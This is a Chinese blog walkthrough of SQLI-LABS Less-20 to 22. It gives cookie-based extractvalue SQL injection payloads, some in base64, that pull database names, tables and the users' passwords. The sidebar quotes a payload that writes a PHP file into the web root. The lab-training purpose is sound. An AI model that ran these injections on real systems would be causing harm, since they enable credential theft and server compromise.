SQLI-LABS Less-20 到 Less-22

已于 2023-04-03 18:00:01 修改
阅读量137 收藏
点赞数 1
分类专栏: SQLI-LABS 文章标签: 数据库 开发语言
于 2023-03-24 20:38:50 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_73802738/article/details/129758140
版权

Cookie

Cookie注入 跟 其他Header注入 有一点不同

Cookie:浏览器向服务器发送请求时发送cookie,或者服务器向浏览器附加cookie,就是将cookie附近在这里的。例如:Cookie:user=admin

源代码如果你设置了Cookie,那么就会执行下面的语句

不会执行:

Less-20

登入一个账号,Hackbar LOAD命令 或 Burp Suite抓包

闭合字符:'$cookee'

查询当前数据库:

Dumb' or extractvalue(1,concat(0x7e,database())) #
#uname=Dumb 这个可以随便填,不会影响到 extractvalue()

查询当前数据库下的表:

Dumb' or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

查询当前表的字段:

Dumb' or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

查询数据:

Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #

Dumb' or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #

Less-21

base64_decode(),对其进行 base64解码

登入一个账号,Hackbar LOAD命令,先把 %3D url解码(从网页上取来的)再base64解码,即 Dumb

闭合字符:('$uname')

查询当前数据库:

Dumb') or extractvalue(1,concat(0x7e,database())) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLGRhdGFiYXNlKCkpKSAj

查询当数据库的表:

Dumb') or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KHRhYmxlX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLnRhYmxlcyB3aGVyZSB0YWJsZV9zY2hlbWE9InNlY3VyaXR5IikpKSAj

查询当前表的字段:

Dumb') or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

base64: dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLChzZWxlY3QgZ3JvdXBfY29uY2F0KGNvbHVtbl9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS5jb2x1bW5zIHdoZXJlIHRhYmxlX3NjaGVtYT0ic2VjdXJpdHkiIGFuZCB0YWJsZV9uYW1lPSJ1c2VycyIpKSkgIw==

查询数据:

Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb') or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...

base64:
Q29va2llOiB1bmFtZT1EdW1iJykgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj

dW5hbWU9RHVtYicpIG9yIGV4dHJhY3R2YWx1ZSgxLGNvbmNhdCgweDdlLHN1YnN0cigoc2VsZWN0IGdyb3VwX2NvbmNhdCh1c2VybmFtZSwnQCcscGFzc3dvcmQpIGZyb20gc2VjdXJpdHkudXNlcnMpLDMxLDMxKSkpICM=

Less-22

改变了闭合字符

登入一个账号,Hackbar LOAD命令 或 Burp Suite抓包,RHVtYg%3D%3D,=(url编码%3D),即Dumb

这里给跳回 Less-21,地址栏的文件名变了 LEss-22

闭合字符:"$cookee1"

查询当前数据库:

Dumb" or extractvalue(1,concat(0x7e,database())) #

base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSxkYXRhYmFzZSgpKSkgIw==

查询当前数据库的表:

Dumb" or extractvalue(1,concat(0x7e,(select group_concat(table_name) from information_schema.tables where table_schema="security"))) #

base64: Q29va2llOiB1bmFtZT1EdW1iIiBvciBleHRyYWN0dmFsdWUoMSxjb25jYXQoMHg3ZSwoc2VsZWN0IGdyb3VwX2NvbmNhdCh0YWJsZV9uYW1lKSBmcm9tIGluZm9ybWF0aW9uX3NjaGVtYS50YWJsZXMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIpKSkgIw==

查询当前表的字段:

Dumb" or extractvalue(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_schema="security" and table_name="users"))) #

base64: RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2UsKHNlbGVjdCBncm91cF9jb25jYXQoY29sdW1uX25hbWUpIGZyb20gaW5mb3JtYXRpb25fc2NoZW1hLmNvbHVtbnMgd2hlcmUgdGFibGVfc2NoZW1hPSJzZWN1cml0eSIgYW5kIHRhYmxlX25hbWU9InVzZXJzIikpKSAj

查询数据:

Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),1,31))) #
Dumb" or extractvalue(1,concat(0x7e,substr((select group_concat(username,'@',password) from security.users),31,31))) #
...

base64:
RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMSwzMSkpKSAj

RHVtYiIgb3IgZXh0cmFjdHZhbHVlKDEsY29uY2F0KDB4N2Usc3Vic3RyKChzZWxlY3QgZ3JvdXBfY29uY2F0KHVzZXJuYW1lLCdAJyxwYXNzd29yZCkgZnJvbSBzZWN1cml0eS51c2VycyksMzEsMzEpKSkgIw==

「已注销」
关注
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
SQLi LABS Less-20 Cookie注入
wangyuxiang946的博客
06-23 1万+
SQLi第二十关,sqllabs less-20sqli-labs less20
sqli-labs/Less-20
m0_71299382的博客
11-18 222
sqli-labs第二十关
Sqlilabs Less-20
Light_inthe_eyes的博客
03-08 239
当正确输入后,页面回显cookie,猜测此注入点在cookie: 用burpsuite抓包,证明猜测: 爆库: Cookie: uname=admin' and updatexml(1,concat(0x7e,(select database())),0)#; 爆表: Cookie: uname=admin' and updatexml(1,concat(0x7e,(select (table_name) from information_schema.tables where table_schema
sqli-labs Less20
m0_60829468的博客
11-09 3094
说明 20关在传入参数时会生成cookie,对生成的cookie可以实行注入。 提交参数的第一个数据包 第二个数据包 一、对第二个数据包的cookie实行注入 Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(database()),0x7e)) # 二、查表 Cookie: uname=uname=admin' and extractvalue(1,concat(0x7e,(select table...
有了这个网络安全面试题,面试就像开了挂!(附PDF)
lvaolan的博客
02-26 725
还有兄弟不知道网络安全面试可以提前刷题吗?费时一周整理的160+网络安全面试题,金九银十,做网络安全面试里的显眼包!王岚嵚工程师面试题(附答案),只能帮兄弟们到这儿了!如果你能答对70%,找一个安全工作,问题不大。对于有1-3年工作经验,想要跳槽的朋友来说,也是很好的温习资料!【完整版领取方式在文末!!​​​​内容实在太多,不一一截图了。
sqli-labs less1.txt
11-26
sqli-labs less1 sql注入第一题,单引号闭合,详细全程,web注入实验,学习sql注入
sqli-labs靶场练习笔记
11-09
- **示例**:`http://127.0.0.1/sqli-labs-master/less-7/?id=-1')) union select 1,2,'($_POST["lcy"]);?>' into outfile 'D:\\phpstudy_pro\\WWW\\sqli-labs-master\\Less-7\\1.php'--`。 - **第8关:基于延迟的...
sqli-labs实验指导手册
11-17
3. **基于不同闭合字符的注入**(如less-3和less-4): - 类似于字符型联合注入,但闭合字符为`)`或`"`,需要相应地调整注入语句。 4. **错误回显注入**(如less-5): - **利用`updatexml`函数**:即使没有直接...
SQLi-LABS Page-1(Basic Challenges)1-22
最新发布
05-18
### SQLi-LABS Page-1 (Basic Challenges)1-22 知识点解析 #### 第一关:Less-1 - 字符型注入 在这一关卡中,我们需要找到一个可注入点,并通过该点执行SQL注入攻击。具体步骤如下: 1. **访问靶场**: - 访问...
sqli-labs PoC 脚本.rar
08-09
sqli-labs 使用到的脚本 课程有:Less01,Less05的爆破数据库+表名+列名数据,Less08的爆破数据库+表名+列名数据,Less9同上,Less11同上,Less16同上。 具体涉及:报错型注入,报错型盲注,布尔型盲注,延时型盲注...
Sqli-labs之Less-20和Less-21和Less-22
→_→
04-15 2953
Less-20 基于错误的cookie头部POST注入 首先从已知的条件中我们知道这又是一道“头部注入”,那么我们先输入正确的用户名和密码看一下登录成功是什么样子的: 回显有User-Agent、IP这样从当次Request直接获取的, 也有Cookie这样刷...
sqli-labs————less 22
Fly_鹏程万里
05-12 406
Less 22简单测试:username:adminpassword:aaa查看一下源代码如下:<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://w...
Less-20
m0_62094846的博客
03-31 817
只能用cookie传参,如果用POST传参,就会提示用cookie,无论cookie中输入什么都是这样 uname=1'# uname=1' order by 3# uname=1' order by 2# 都不会有任何回显,但是4就会报错,也只会报错 但是select的时候又直接回显了,不知道为什么order by 1和2的时候不报错 uname=1' union select 1,2,3# 所以按照正常的查就可以了 uname=1' union select d...
Less 20 (cookie注入)
老司机开代码的博客
08-03 359
文章目录1. 题目分析2. 思路3. 注入手法3.1 更改本地cookie3.2 抓包更改cookie 1. 题目分析 首页是一个登录框,登录成功后,可以看到如下界面: 这里记录了很多请求头信息。接着看一下网站源码: <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="ht
生命在于折腾——SQL注入的实操(四)less16-20
易水哲的博客
08-20 282
sql-lib项目,本篇文章介绍关卡16-20
sqli-labs (less-20)
kukudeshuo的博客
03-11 312
sqli-labs (less-20) 进入20关,输入用户名和密码后,屏幕回显了我们的USER AGENT、IP地址、cookie信息 通过回显的为cookie信息我们猜测这关注入点很有可能在cookie里,题目提示也告诉我们为cookie注入 这里我们利用火狐的一个小工具来抓取cookie的信息,这个工具的名字为Cookies Manager +,我们打开来查看当前页面的cookie信息 我们输入’试试 屏幕回显报错 根据报错信息判断闭合方式为’#,并且为字符型注入 判断字段长度 判断字段
Sqlilabs通关(Less11-Less20
wcl20010的博客
05-11 524
这十关都是POST型,使用burpsuit或者使用火狐浏览器的插件hackbar。 hackbar链接:链接:https://pan.baidu.com/s/1bIP9lOBUtoH3_D5Apkmi2w 提取码:7odr 这里我的hackbar是破解版的。注意添加后禁止更新,当然可以去插件中间下载一个新版,平时使用它,不付费不能使用post等提交请求。但是我这破解版的,再提交表单后无法发现是post还是get。挺无语的。搭配使用吧。 less-11 基于错误的POST型单引号字符型注入 这就是我上
sqli-labs Less-20(cookie注入)
万丈⾼楼平地起,勿在浮沙筑⾼台学艺不精的安全菜鸡,改行回家养猪了,对博客有疑问欢迎留言,看到一定回
02-03 343
本篇文章使用的环境为sqli-labs Less-20 不懂为什么使用账户admin:admin登陆后页面没有正常返回cookie,所有我使用工具添加了一条cookie信息, 使用burp suite抓取流量包 1、修改cookie值,发现是使用单引号闭合的 此处可以看到页面存在报错信息,可以使用报错注入 2、判断字段数 通过使用order by 进行判断,发现存在3个字段 3、尝试使用联合查询(使用联合查询时,需要使前面的查询语句结果为假),判断当前页面是否有显示位 可以看到当前页面存在显示位置
less12-less20()
qq_36567469的博客
03-20 4001
总结 user_agent注入 referer注入 cookie注入 updatexml()报错注入 less12 用户名密码输入 a") or ("1"="1 得到一个账户Dumb、Dumb。 用户名密码处分别输入计算出行数 Dumb") and ("1"="1 Dumb") and 1=1 order by 2-- 输入 Dumb") and ("1"="2 Dumb") and 1=2 union select 1,2-- 输入 Dumb") and ("1"="2 Dumb") and 1
sqli-labs less
07-28
抱歉,我无法回答关于sqli-labs less的问题。 #### 引用[.reference_title] - *1* *2* *3* [sqli-labs教程——Less 1-10](https://blog.csdn.net/qq_25649867/article/details/111020393)[target="_blank" data-...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值